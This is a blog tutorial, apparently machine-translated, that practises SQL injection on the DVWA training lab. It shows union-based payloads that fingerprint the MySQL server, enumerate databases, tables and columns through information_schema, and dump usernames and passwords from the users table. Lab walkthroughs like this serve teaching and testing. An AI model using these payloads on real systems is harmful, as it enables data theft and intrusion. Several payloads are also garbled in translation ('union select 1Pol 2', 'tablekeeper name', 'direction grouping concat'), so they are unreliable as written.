Shulou(Shulou.com)06/01 Report--

Introduction:

With regard to the basic knowledge of sql injection, I also wrote in the last article. This article will use the loophole environment of the target machine to practice. The so-called practice leads to the truth. The vulnerability platform we try this time is DVWA,Github download address: DVWA.

About the basic knowledge or posture of injection, I will explain it in detail in practice.

Experiment:

LOW level

First enter 1 to have a look.

We're putting in single quotation marks.

Why doesn't the search box here show single quotation marks? Because it's encoded by url.

The general url code actually means that the ASCII of that character is worth hexadecimal, followed by a%.

You can look at URL coding, here you can find the url coding of each character, of course, your own programming or use the language should also have its own function to achieve url coding.

Here is the url coding that is common in sql injection:

The space is 20

Single quotation marks are 27

The pound sign is 23 (table note)

Double quotation marks are 22

We can see that this is a parameter expanded by two single quotation marks. Take a look at the source code.

Let's see.

$query = "SELECT first_name, last_name FROM users WHERE user_id ='$id';" $id = $_ REQUEST ['id']

The parameters have not been filtered. We try to close the single quotation marks.

For example, if we enter id=1' or'1 for example,

The statement becomes

$query = "SELECT first_name, last_name FROM users WHERE user_id ='1' or'1.

Of course, we can also use comments to annotate the single quotation marks that follow

You can use # (ignore)-(ignore) for a single line of comments in sql, and / / for multiple lines.

Let's try 1'#

Let's take advantage of the loophole to obtain database information.

The approximate steps are:

1. Guess the number of fields queried

two。 Get field display bit

3. Get database information through display bits

4. Get the table name in the database

5. Get the column name (field) in the table

6. Export data in the database

7. Verify the validity of the exported data

Guess the number of fields queried

Method 1: order by num

If the num value exceeds the number of fields, the query will report an error, thus determining the number of fields queried by the select statement

Enter:

1 'order by 2 #

1 'order by 3 #

An error is reported, indicating that there are only two fields in the data table

Method two: union select 1, 2, 2, 3.

If the digits after union select (not necessarily 1-2-3, as long as there are digits) do not exactly correspond to the field bits of the actual query, the query will report an error until it is adjusted to the number of placeholders when no error is reported, thus judging the number of fields actually queried.

Input: union select 1Pol 2 #

Input: union select 1m 2.3 #

Get the display bits of the field

1 'union select 1pm 2 #

Since the display bit shows the value we set, we get the data through the display bit and output it.

Get database information through display bits

Some functions commonly used in Mysql injection will be used here. See this article for more information on the built-in functions commonly used in SQL injection (take MySql as an example)

Get the database name of the current connection, the version of DBMS (the version of Mysql)

1 'union select database (), version () #

Get the user who is currently connected to the database

1 'union select 1) user () #

Get the operating system of the server and the storage directory of the database

1 'union select @ @ version_compile_os,@@datadir #

Get all database names in the database

Before that, popularize the knowledge of the database.

Mysql database information_schema, he is the system database, after installation, records are the current database database, tables, columns, user rights and other information

Information_schema.schemata records all database names

Information_schema.tables: the table that records the table name information (also has the database name field)

Information_schema.columns: the table that records the column name information (database name, table name, field name)

1 'union select 1 schemaaccounname from information_schema.schemata # may be a permission problem, not all of it has been exposed.

Go to the database and execute it like this.

We found that the database dvwa is exactly what we want, so, through this database, we explode the table.

Gets all the tables in the current connection database (dvwa)

1 'union select 1 from information_schema.tables where table_schema= tablekeeper name "dvwa" #

Where.. For the restrictions shown later, look only for tables whose database name is dvwa.

Get the column name (field) in the table

1 'union select 1 columnkeeper name from information_schema.columns where table_name= "users" #

The output is a little messy, so we use group_concat () to simply output them.

1 'union select 1 direction grouping concat (column_name) from information_schema.columns where table_name= "users" #

If you feel a little crowded and uncomfortable, you can

1 'union select 1 direction grouping concat (column_name,'') from information_schema.columns where table_name= "users" #

Isn't that much more obvious? About group_concat (), and concat () can learn from Baidu on its own.

If you know the table name and field name of the database, you can burst the table.

Burst the meter

1 'union select 1 concat (user,'--',password) from users #

There are other more export operations, and you can try some export functions on your own.

Verify the validity of the exported data

OK!!

Medium

It's just that the closure is different.

The rest of the steps are similar to those above.

High

Find a way to close it, and the rest will naturally get better!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.